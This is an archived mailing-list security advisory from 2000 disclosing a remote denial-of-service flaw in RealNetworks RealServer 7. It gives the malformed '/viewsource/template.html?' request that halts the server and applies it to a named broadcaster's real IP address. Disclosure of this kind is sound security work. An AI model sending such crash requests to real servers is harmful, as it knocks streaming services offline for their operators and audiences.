OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability
From: Ussr Labs (labsUSSRBACK.COM)
Date: Tue Aug 01 2000 - 05:58:16 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote DoS attack in Real Networks Real Server (Strike #2)
Vulnerability

USSR Advisory Code: USSR-2000043

Release Date:
June 1, 2000

Systems Affected:
Real Networks Real Server 7 Linuxc6
Real Networks Real Server 7 Solaris 2.6
Real Networks Real Server 7 Solaris 2.7
Real Networks Real Server 7 Solaris 2.8
Real Networks Real Server 7 Windows NT/2000
Real Networks Real Server 7 SGI Irix 6.2
Real Networks Real Server 7 SGI Irix 6.5
Real Networks Real Server 7 SCO Unixware 7.xx
Real Networks Real Server 7 FreeBSD 3.0
Real Networks Real Server 7.01 Linuxc6
Real Networks Real Server 7.01 Solaris 2.6
Real Networks Real Server 7.01 Solaris 2.7
Real Networks Real Server 7.01 Solaris 2.8
Real Networks Real Server 7.01 Windows NT/2000
Real Networks Real Server 7.01 SGI Irix 6.2
Real Networks Real Server 7.01 SGI Irix 6.5
Real Networks Real Server 7.01 SCO Unixware 7.xx
Real Networks Real Server 7.01 FreeBSD 3.0
Real Networks Real Server G2 1.0

THE PROBLEM

The Ussr Labs team has recently discovered a memory problem in the
RealServer 7 Server (patched and non-patched).

What happens is, by performing an attack sending specially-malformed
information to the RealServer HTTP Port(default is 8080), the process
containing the services will stop responding.

The Exploit:
It will take down the RealServer causing it to stop all streaming
media brodcasts, making it non-functional, (untill Reboot)

Example:
With the RealServer server running on 'Port' (default being 8080) the
syntax to do the D.O.S. attack is:

http://ServerIp:Port/viewsource/template.html?

And Real Server will Stop Responding.

Example:
With the RealServer server running on 'Port' (default being 8080) the
syntax to do the D.O.S. attack is:

http://ServerIp:Port/viewsource/template.html?

And Real Server will Stop Responding.

SPECIAL NOTE: That we take no responsibility for this Example it is
for educational purposes only,Dont test against British Broadcasting
Corporation 1999 Radio

Exaple 2:
Radio: British Broadcasting Corporation 1999 (default in RealPlayer
8)

Radio Url:
http://playlist.broadcast.com/makeplaylist.asp?id=7708&encad=2F6164732
F617564696F686967687761792F617564696F68696768776179325F3238

RealServer http running on port 80

RealServer http ip: 206.190.42.7

Valid Url for Clip Source:
http://206.190.42.7/viewsource/template.html?nuyhtgs0pdz6iqm557a6i9bgj
054ngdnbfzgro7zxfAjq357lnwEC6ne8s5ge5hi4ejqC1t6x1amngaAmkyf59v6zgjqC1t
6x1amngoAmkyf1AvuEfhe640hBh60EeADAo2097qglh

Malformed Url for Clip Source:
http://206.190.42.7/viewsource/template.html?

Vendor Status:
Yes! Informed! I sent them more than 4 emails and each time I
received JUNK mails in reply, my Incident ID number for this request
is 19163930.

Vendor Url: http://www.real.com
Program Url:
http://www.realnetworks.com/products/basicserverplus/index.html?src=ho
me
Download Url:
http://proforma.real.com/rn/servers/eval/index.html?src=home,srvpl_020
400,srvntra

Related Links:

Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f,Technotronic and Rfp.

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of Ussr. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
labsussrback.com for permission.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labsussrback.com
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOYasnq3JcbWNj6DDEQL58ACfdhJcv0QYOXej0HWRxlnc4yIZbYYAn1ms
DMxIL7bkggsvWz2Gxk4Kpw0K
=PJ98
-----END PGP SIGNATURE-----